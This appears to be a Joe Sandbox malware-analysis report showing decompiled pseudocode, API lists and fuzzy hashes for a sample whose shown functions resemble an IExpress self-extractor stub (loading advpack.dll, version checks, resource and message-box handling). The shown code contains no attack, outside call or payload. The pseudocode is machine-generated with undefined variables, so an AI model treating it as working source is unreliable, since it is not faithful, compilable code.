                                                                                                                                                                                                      0x000e39b6
                                                                                                                                                                                                      0x000e3a0f
                                                                                                                                                                                                      0x000e3a0f
                                                                                                                                                                                                      0x000e3a11
                                                                                                                                                                                                      0x000e3a13
                                                                                                                                                                                                      0x000e3a19
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e39b8
                                                                                                                                                                                                      0x000e39b8
                                                                                                                                                                                                      0x000e39ba
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e39bc
                                                                                                                                                                                                      0x000e39bf
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e39c3
                                                                                                                                                                                                      0x000e39c9
                                                                                                                                                                                                      0x000e39ce
                                                                                                                                                                                                      0x000e39d0
                                                                                                                                                                                                      0x000e39e3
                                                                                                                                                                                                      0x000e39e5
                                                                                                                                                                                                      0x000e39e6
                                                                                                                                                                                                      0x000e39f1
                                                                                                                                                                                                      0x000e39f7
                                                                                                                                                                                                      0x000e39fa
                                                                                                                                                                                                      0x000e3a01
                                                                                                                                                                                                      0x000e3a04
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e3a06
                                                                                                                                                                                                      0x000e3a09
                                                                                                                                                                                                      0x000e3a09
                                                                                                                                                                                                      0x000e3a0b
                                                                                                                                                                                                      0x000e3a0b
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e3a09
                                                                                                                                                                                                      0x000e39fc
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e39fc
                                                                                                                                                                                                      0x000e39d3
                                                                                                                                                                                                      0x000e39d8
                                                                                                                                                                                                      0x000e39da
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e39dc
                                                                                                                                                                                                      0x000e39b6
                                                                                                                                                                                                      0x000e3955
                                                                                                                                                                                                      0x000e395b
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e3961
                                                                                                                                                                                                      0x000e3963
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e3969
                                                                                                                                                                                                      0x000e3969
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e3969
                                                                                                                                                                                                      0x000e3915
                                                                                                                                                                                                      0x000e3915
                                                                                                                                                                                                      0x000e391b
                                                                                                                                                                                                      0x000e391f
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e392d
                                                                                                                                                                                                      0x000e3933
                                                                                                                                                                                                      0x000e3938
                                                                                                                                                                                                      0x000e393a
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e3940
                                                                                                                                                                                                      0x000e3946
                                                                                                                                                                                                      0x000e394b
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e394b
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e38f2
                                                                                                                                                                                                      0x000e3843
                                                                                                                                                                                                      0x000e3845

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetVersionExA.KERNEL32(?,00000000,?,?), ref: 000E3723
                                                                                                                                                                                                      • MessageBeep.USER32(00000000), ref: 000E39C3
                                                                                                                                                                                                      • MessageBoxA.USER32(00000000,00000000,cent,00000030), ref: 000E39F1
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.430701933.00000000000E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.430673147.00000000000E0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430721183.00000000000E8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_e0000_sSH13Pp30.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Message$BeepVersion
                                                                                                                                                                                                      • String ID: 3$cent
                                                                                                                                                                                                      • API String ID: 2519184315-3438608206
                                                                                                                                                                                                      • Opcode ID: 93a48c0bc8f6ec2467eed27b2a4c37439f5a9d9e236f4248a5a317e74dee6e4f
                                                                                                                                                                                                      • Instruction ID: 37769bdf3d7e7bb955a820cef94f087bcaeb5968dd0d431e1ea59b52b3a8fb4a
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 93a48c0bc8f6ec2467eed27b2a4c37439f5a9d9e236f4248a5a317e74dee6e4f
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3D91F571A012D49FEBB48A16CD897EA7BF1AF85700F1540A9D889BB251DB758F80CF41
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 83%
                                                                                                                                                                                                      			E000E6495(void* __ebx, void* __ecx, void* __esi, void* __eflags) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v268;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				signed int _t9;
                                                                                                                                                                                                      				signed char _t14;
                                                                                                                                                                                                      				struct HINSTANCE__* _t15;
                                                                                                                                                                                                      				void* _t18;
                                                                                                                                                                                                      				CHAR* _t26;
                                                                                                                                                                                                      				void* _t27;
                                                                                                                                                                                                      				signed int _t28;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t27 = __esi;
                                                                                                                                                                                                      				_t18 = __ebx;
                                                                                                                                                                                                      				_t9 =  *0xe8004; // 0xb7c20988
                                                                                                                                                                                                      				_v8 = _t9 ^ _t28;
                                                                                                                                                                                                      				_push(__ecx);
                                                                                                                                                                                                      				E000E1781( &_v268, 0x104, __ecx, "C:\Users\alfons\AppData\Local\Temp\IXP002.TMP\");
                                                                                                                                                                                                      				_t26 = "advpack.dll";
                                                                                                                                                                                                      				E000E658A( &_v268, 0x104, _t26);
                                                                                                                                                                                                      				_t14 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                      				if(_t14 == 0xffffffff || (_t14 & 0x00000010) != 0) {
                                                                                                                                                                                                      					_t15 = LoadLibraryA(_t26);
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					_t15 = LoadLibraryExA( &_v268, 0, 8);
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return E000E6CE0(_t15, _t18, _v8 ^ _t28, 0x104, _t26, _t27);
                                                                                                                                                                                                      			}














                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetFileAttributesA.KERNEL32(?,advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00000000), ref: 000E64DF
                                                                                                                                                                                                      • LoadLibraryExA.KERNEL32(?,00000000,00000008,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00000000), ref: 000E64F9
                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00000000), ref: 000E6502
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.430701933.00000000000E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.430673147.00000000000E0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430721183.00000000000E8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_e0000_sSH13Pp30.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: LibraryLoad$AttributesFile
                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$advpack.dll
                                                                                                                                                                                                      • API String ID: 438848745-2284591408
                                                                                                                                                                                                      • Opcode ID: 77f20172dd6e14af7b20516b06c99a5c5040b23f5d12f1ce3cabf6d67b1f6320
                                                                                                                                                                                                      • Instruction ID: f420955e701ca6099a83277675e472e7603ddf8550c2e63c8c076a2c9d37d4d1
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 77f20172dd6e14af7b20516b06c99a5c5040b23f5d12f1ce3cabf6d67b1f6320
                                                                                                                                                                                                      • Instruction Fuzzy Hash: F00126317001889FE790EB62EC89AEE7378DB65710F500195F585B61C0CF75AE858A01
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E000E28E8(intOrPtr __ecx, char* __edx, intOrPtr* _a8) {
                                                                                                                                                                                                      				void* _v8;
                                                                                                                                                                                                      				char* _v12;
                                                                                                                                                                                                      				intOrPtr _v16;
                                                                                                                                                                                                      				void* _v20;
                                                                                                                                                                                                      				intOrPtr _v24;
                                                                                                                                                                                                      				int _v28;
                                                                                                                                                                                                      				int _v32;
                                                                                                                                                                                                      				void* _v36;
                                                                                                                                                                                                      				int _v40;
                                                                                                                                                                                                      				void* _v44;
                                                                                                                                                                                                      				intOrPtr _v48;
                                                                                                                                                                                                      				intOrPtr _v52;
                                                                                                                                                                                                      				intOrPtr _v56;
                                                                                                                                                                                                      				intOrPtr _v60;
                                                                                                                                                                                                      				intOrPtr _v64;
                                                                                                                                                                                                      				long _t68;
                                                                                                                                                                                                      				void* _t70;
                                                                                                                                                                                                      				void* _t73;
                                                                                                                                                                                                      				void* _t79;
                                                                                                                                                                                                      				void* _t83;
                                                                                                                                                                                                      				void* _t87;
                                                                                                                                                                                                      				void* _t88;
                                                                                                                                                                                                      				intOrPtr _t93;
                                                                                                                                                                                                      				intOrPtr _t97;
                                                                                                                                                                                                      				intOrPtr _t99;
                                                                                                                                                                                                      				int _t101;
                                                                                                                                                                                                      				void* _t103;
                                                                                                                                                                                                      				void* _t106;
                                                                                                                                                                                                      				void* _t109;
                                                                                                                                                                                                      				void* _t110;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_v12 = __edx;
                                                                                                                                                                                                      				_t99 = __ecx;
                                                                                                                                                                                                      				_t106 = 0;
                                                                                                                                                                                                      				_v16 = __ecx;
                                                                                                                                                                                                      				_t87 = 0;
                                                                                                                                                                                                      				_t103 = 0;
                                                                                                                                                                                                      				_v20 = 0;
                                                                                                                                                                                                      				if( *((intOrPtr*)(__ecx + 0x7c)) <= 0) {
                                                                                                                                                                                                      					L19:
                                                                                                                                                                                                      					_t106 = 1;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					_t62 = 0;
                                                                                                                                                                                                      					_v8 = 0;
                                                                                                                                                                                                      					while(1) {
                                                                                                                                                                                                      						_v24 =  *((intOrPtr*)(_t99 + 0x80));
                                                                                                                                                                                                      						if(E000E2773(_v12,  *((intOrPtr*)(_t62 + _t99 +  *((intOrPtr*)(_t99 + 0x80)) + 0xbc)) + _t99 + 0x84) == 0) {
                                                                                                                                                                                                      							goto L20;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t68 = GetFileVersionInfoSizeA(_v12,  &_v32);
                                                                                                                                                                                                      						_v28 = _t68;
                                                                                                                                                                                                      						if(_t68 == 0) {
                                                                                                                                                                                                      							_t99 = _v16;
                                                                                                                                                                                                      							_t70 = _v8 + _t99;
                                                                                                                                                                                                      							_t93 = _v24;
                                                                                                                                                                                                      							_t87 = _v20;
                                                                                                                                                                                                      							if( *((intOrPtr*)(_t70 + _t93 + 0x84)) == _t106 &&  *((intOrPtr*)(_t70 + _t93 + 0x88)) == _t106) {
                                                                                                                                                                                                      								goto L18;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							_t103 = GlobalAlloc(0x42, _t68);
                                                                                                                                                                                                      							if(_t103 != 0) {
                                                                                                                                                                                                      								_t73 = GlobalLock(_t103);
                                                                                                                                                                                                      								_v36 = _t73;
                                                                                                                                                                                                      								if(_t73 != 0) {
                                                                                                                                                                                                      									if(GetFileVersionInfoA(_v12, _v32, _v28, _t73) == 0 || VerQueryValueA(_v36, "\\",  &_v44,  &_v40) == 0 || _v40 == 0) {
                                                                                                                                                                                                      										L15:
                                                                                                                                                                                                      										GlobalUnlock(_t103);
                                                                                                                                                                                                      										_t99 = _v16;
                                                                                                                                                                                                      										L18:
                                                                                                                                                                                                      										_t87 = _t87 + 1;
                                                                                                                                                                                                      										_t62 = _v8 + 0x3c;
                                                                                                                                                                                                      										_v20 = _t87;
                                                                                                                                                                                                      										_v8 = _v8 + 0x3c;
                                                                                                                                                                                                      										if(_t87 <  *((intOrPtr*)(_t99 + 0x7c))) {
                                                                                                                                                                                                      											continue;
                                                                                                                                                                                                      										} else {
                                                                                                                                                                                                      											goto L19;
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                      										_t79 = _v44;
                                                                                                                                                                                                      										_t88 = _t106;
                                                                                                                                                                                                      										_v28 =  *((intOrPtr*)(_t79 + 0xc));
                                                                                                                                                                                                      										_t101 = _v28;
                                                                                                                                                                                                      										_v48 =  *((intOrPtr*)(_t79 + 8));
                                                                                                                                                                                                      										_t83 = _v8 + _v16 + _v24 + 0x94;
                                                                                                                                                                                                      										_t97 = _v48;
                                                                                                                                                                                                      										_v36 = _t83;
                                                                                                                                                                                                      										_t109 = _t83;
                                                                                                                                                                                                      										do {
                                                                                                                                                                                                      											 *((intOrPtr*)(_t110 + _t88 - 0x34)) = E000E2A89(_t97, _t101,  *((intOrPtr*)(_t109 - 0x10)),  *((intOrPtr*)(_t109 - 0xc)));
                                                                                                                                                                                                      											 *((intOrPtr*)(_t110 + _t88 - 0x3c)) = E000E2A89(_t97, _t101,  *((intOrPtr*)(_t109 - 4)),  *_t109);
                                                                                                                                                                                                      											_t109 = _t109 + 0x18;
                                                                                                                                                                                                      											_t88 = _t88 + 4;
                                                                                                                                                                                                      										} while (_t88 < 8);
                                                                                                                                                                                                      										_t87 = _v20;
                                                                                                                                                                                                      										_t106 = 0;
                                                                                                                                                                                                      										if(_v56 < 0 || _v64 > 0) {
                                                                                                                                                                                                      											if(_v52 < _t106 || _v60 > _t106) {
                                                                                                                                                                                                      												GlobalUnlock(_t103);
                                                                                                                                                                                                      											} else {
                                                                                                                                                                                                      												goto L15;
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      										} else {
                                                                                                                                                                                                      											goto L15;
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						goto L20;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				L20:
                                                                                                                                                                                                      				 *_a8 = _t87;
                                                                                                                                                                                                      				if(_t103 != 0) {
                                                                                                                                                                                                      					GlobalFree(_t103);
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return _t106;
                                                                                                                                                                                                      			}


































                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GlobalFree.KERNEL32 ref: 000E2A6F
                                                                                                                                                                                                        • Part of subcall function 000E2773: CharUpperA.USER32(B7C20988,00000000,00000000,00000000), ref: 000E27A8
                                                                                                                                                                                                        • Part of subcall function 000E2773: CharNextA.USER32(0000054D), ref: 000E27B5
                                                                                                                                                                                                        • Part of subcall function 000E2773: CharNextA.USER32(00000000), ref: 000E27BC
                                                                                                                                                                                                        • Part of subcall function 000E2773: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 000E2829
                                                                                                                                                                                                        • Part of subcall function 000E2773: RegQueryValueExA.ADVAPI32(?,000E1140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 000E2852
                                                                                                                                                                                                        • Part of subcall function 000E2773: ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 000E2870
                                                                                                                                                                                                        • Part of subcall function 000E2773: RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 000E28A0
                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000042,00000000,?,?,?,?,?,?,?,?,000E3938,?,?,?,?,-00000005), ref: 000E2958
                                                                                                                                                                                                      • GlobalLock.KERNEL32 ref: 000E2969
                                                                                                                                                                                                      • GlobalUnlock.KERNEL32(00000000,?,?,?,?,?,?,?,?,000E3938,?,?,?,?,-00000005,?), ref: 000E2A21
                                                                                                                                                                                                      • GlobalUnlock.KERNEL32(00000000,?,?,?,?), ref: 000E2A81
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.430701933.00000000000E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 000E0000, based on PE: true
• Associated: 00000002.00000002.430673147.00000000000E0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430721183.00000000000E8000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430733752.00000000000EA000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430733752.00000000000EC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_e0000_sSH13Pp30.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Global$Char$NextUnlock$AllocCloseEnvironmentExpandFreeLockOpenQueryStringsUpperValue
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3949799724-0
                                                                                                                                                                                                      • Opcode ID: 88f8ec384f777ce074e289240a162df0dd5f33e854c108b02078af80fe1e0b20
                                                                                                                                                                                                      • Instruction ID: 384c2ee2039dab720887dddea692b6948e1bf257202ef39f94db5cddd54ec742
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 88f8ec384f777ce074e289240a162df0dd5f33e854c108b02078af80fe1e0b20
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6F513B31E00259DFDB25DF99C884AAEFBB9FF48700F18412AE911F7221D7359A41DBA1
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 32%
                                                                                                                                                                                                      			E000E4169(void* __eflags) {
                                                                                                                                                                                                      				int _t18;
                                                                                                                                                                                                      				void* _t21;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t20 = E000E468F("FINISHMSG", 0, 0);
                                                                                                                                                                                                      				_t21 = LocalAlloc(0x40, 4 + _t3 * 4);
                                                                                                                                                                                                      				if(_t21 != 0) {
                                                                                                                                                                                                      					if(E000E468F("FINISHMSG", _t21, _t20) != 0) {
                                                                                                                                                                                                      						if(lstrcmpA(_t21, "<None>") == 0) {
                                                                                                                                                                                                      							L7:
                                                                                                                                                                                                      							return LocalFree(_t21);
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_push(0);
                                                                                                                                                                                                      						_push(0x40);
                                                                                                                                                                                                      						_push(0);
                                                                                                                                                                                                      						_push(_t21);
                                                                                                                                                                                                      						_t18 = 0x3e9;
                                                                                                                                                                                                      						L6:
                                                                                                                                                                                                      						E000E44B9(0, _t18);
                                                                                                                                                                                                      						goto L7;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_push(0);
                                                                                                                                                                                                      					_push(0x10);
                                                                                                                                                                                                      					_push(0);
                                                                                                                                                                                                      					_push(0);
                                                                                                                                                                                                      					_t18 = 0x4b1;
                                                                                                                                                                                                      					goto L6;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return E000E44B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                      			}






                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 000E468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000E46A0
                                                                                                                                                                                                        • Part of subcall function 000E468F: SizeofResource.KERNEL32(00000000,00000000,?,000E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000E46A9
                                                                                                                                                                                                        • Part of subcall function 000E468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000E46C3
                                                                                                                                                                                                        • Part of subcall function 000E468F: LoadResource.KERNEL32(00000000,00000000,?,000E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000E46CC
                                                                                                                                                                                                        • Part of subcall function 000E468F: LockResource.KERNEL32(00000000,?,000E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000E46D3
                                                                                                                                                                                                        • Part of subcall function 000E468F: memcpy_s.MSVCRT ref: 000E46E5
                                                                                                                                                                                                        • Part of subcall function 000E468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 000E46EF
                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,?,00000000,00000000,00000105,00000000,000E30B4), ref: 000E4189
                                                                                                                                                                                                      • LocalFree.KERNEL32(00000000,?,00000000,00000000,00000105,00000000,000E30B4), ref: 000E41E7
                                                                                                                                                                                                        • Part of subcall function 000E44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 000E4518
                                                                                                                                                                                                        • Part of subcall function 000E44B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 000E4554
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.430701933.00000000000E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.430673147.00000000000E0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430721183.00000000000E8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_e0000_sSH13Pp30.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
                                                                                                                                                                                                      • String ID: <None>$FINISHMSG
                                                                                                                                                                                                      • API String ID: 3507850446-3091758298
                                                                                                                                                                                                      • Opcode ID: 77e2ce1309fe7d553af3426681a866cc3ca573cb3062f5737e8793ae870170a2
                                                                                                                                                                                                      • Instruction ID: c4822a6b43938de2649f437cb45ae75349ea809c46d801c01ad5933011e83630
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 77e2ce1309fe7d553af3426681a866cc3ca573cb3062f5737e8793ae870170a2
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3E01D1B17002943FF7281A678C86FBB618EDBD9B95F004069B705F51C19AACDC4141B6
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E000E7155() {
                                                                                                                                                                                                      				void* _v8;
                                                                                                                                                                                                      				struct _FILETIME _v16;
                                                                                                                                                                                                      				signed int _v20;
                                                                                                                                                                                                      				union _LARGE_INTEGER _v24;
                                                                                                                                                                                                      				signed int _t23;
                                                                                                                                                                                                      				signed int _t36;
                                                                                                                                                                                                      				signed int _t37;
                                                                                                                                                                                                      				signed int _t39;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_v16.dwLowDateTime = _v16.dwLowDateTime & 0x00000000;
                                                                                                                                                                                                      				_v16.dwHighDateTime = _v16.dwHighDateTime & 0x00000000;
                                                                                                                                                                                                      				_t23 =  *0xe8004; // 0xb7c20988
                                                                                                                                                                                                      				if(_t23 == 0xbb40e64e || (0xffff0000 & _t23) == 0) {
                                                                                                                                                                                                      					GetSystemTimeAsFileTime( &_v16);
                                                                                                                                                                                                      					_v8 = _v16.dwHighDateTime ^ _v16.dwLowDateTime;
                                                                                                                                                                                                      					_v8 = _v8 ^ GetCurrentProcessId();
                                                                                                                                                                                                      					_v8 = _v8 ^ GetCurrentThreadId();
                                                                                                                                                                                                      					_v8 = GetTickCount() ^ _v8 ^  &_v8;
                                                                                                                                                                                                      					QueryPerformanceCounter( &_v24);
                                                                                                                                                                                                      					_t36 = _v20 ^ _v24.LowPart ^ _v8;
                                                                                                                                                                                                      					_t39 = _t36;
                                                                                                                                                                                                      					if(_t36 == 0xbb40e64e || ( *0xe8004 & 0xffff0000) == 0) {
                                                                                                                                                                                                      						_t36 = 0xbb40e64f;
                                                                                                                                                                                                      						_t39 = 0xbb40e64f;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					 *0xe8004 = _t39;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t37 =  !_t36;
                                                                                                                                                                                                      				 *0xe8008 = _t37;
                                                                                                                                                                                                      				return _t37;
                                                                                                                                                                                                      			}












                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 000E7182
                                                                                                                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 000E7191
                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 000E719A
                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 000E71A3
                                                                                                                                                                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 000E71B8
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.430701933.00000000000E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.430673147.00000000000E0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430721183.00000000000E8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_e0000_sSH13Pp30.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1445889803-0
                                                                                                                                                                                                      • Opcode ID: 680a267d980fb411a60a5625239ffd305cc1b48f2ca69f0fb7a9579d391305e5
                                                                                                                                                                                                      • Instruction ID: 138550d7725a86fe7dc626fa9556b798765fd22d3b0c17ee883fd15e6ffb40f1
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 680a267d980fb411a60a5625239ffd305cc1b48f2ca69f0fb7a9579d391305e5
                                                                                                                                                                                                      • Instruction Fuzzy Hash: D2114F71E05248DFDB50DFB8DA8869EB7F4EF49711F514896E805FB210DA349E048B41
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 93%
                                                                                                                                                                                                      			E000E19E0(void* __ebx, void* __edi, struct HWND__* _a4, intOrPtr _a8, int _a12, int _a16) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v520;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t11;
                                                                                                                                                                                                      				void* _t14;
                                                                                                                                                                                                      				void* _t23;
                                                                                                                                                                                                      				void* _t27;
                                                                                                                                                                                                      				void* _t33;
                                                                                                                                                                                                      				struct HWND__* _t34;
                                                                                                                                                                                                      				signed int _t35;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t33 = __edi;
                                                                                                                                                                                                      				_t27 = __ebx;
                                                                                                                                                                                                      				_t11 =  *0xe8004; // 0xb7c20988
                                                                                                                                                                                                      				_v8 = _t11 ^ _t35;
                                                                                                                                                                                                      				_t34 = _a4;
                                                                                                                                                                                                      				_t14 = _a8 - 0x110;
                                                                                                                                                                                                      				if(_t14 == 0) {
                                                                                                                                                                                                      					_t32 = GetDesktopWindow();
                                                                                                                                                                                                      					E000E43D0(_t34, _t15);
                                                                                                                                                                                                      					_v520 = 0;
                                                                                                                                                                                                      					LoadStringA( *0xe9a3c, _a16,  &_v520, 0x200);
                                                                                                                                                                                                      					SetDlgItemTextA(_t34, 0x83f,  &_v520);
                                                                                                                                                                                                      					MessageBeep(0xffffffff);
                                                                                                                                                                                                      					goto L6;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					if(_t14 != 1) {
                                                                                                                                                                                                      						L4:
                                                                                                                                                                                                      						_t23 = 0;
                                                                                                                                                                                                      					} else {
